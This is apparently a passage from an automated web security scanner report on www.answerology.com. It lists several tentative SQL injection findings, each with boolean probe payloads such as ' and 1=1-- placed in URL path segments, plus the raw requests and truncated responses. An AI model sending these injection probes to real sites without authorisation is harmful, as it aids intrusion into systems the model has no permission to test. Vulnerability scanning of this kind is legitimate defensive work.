...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:27 GMT
Content-Length: 58840
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Relationship Advice - Get Answers to Relationship Questions</title>
<meta name="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.23. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/cosmogirl/CosmogirlLayout.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands'%20and%201%3d1--%20/cosmogirl/CosmogirlLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:50 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands'%20and%201%3d2--%20/cosmogirl/CosmogirlLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:50 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.24. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/cosmopolitan/CosmopolitanLayout.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands'%20and%201%3d1--%20/cosmopolitan/CosmopolitanLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:46 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands'%20and%201%3d2--%20/cosmopolitan/CosmopolitanLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:46 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.25. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/cosmopolitan/CosmopolitanLayout.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/cosmopolitan/CosmopolitanLayout.js'%20and%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/cosmopolitan/CosmopolitanLayout.js'%20and%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.26. http://www.answerology.com/cobrands/goodhousekeeping/GoodhousekeepingLayout.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/goodhousekeeping/GoodhousekeepingLayout.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 34982982'%20or%201%3d1--%20 and 34982982'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/goodhousekeeping/GoodhousekeepingLayout.js34982982'%20or%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/goodhousekeeping/GoodhousekeepingLayout.js34982982'%20or%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:56 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

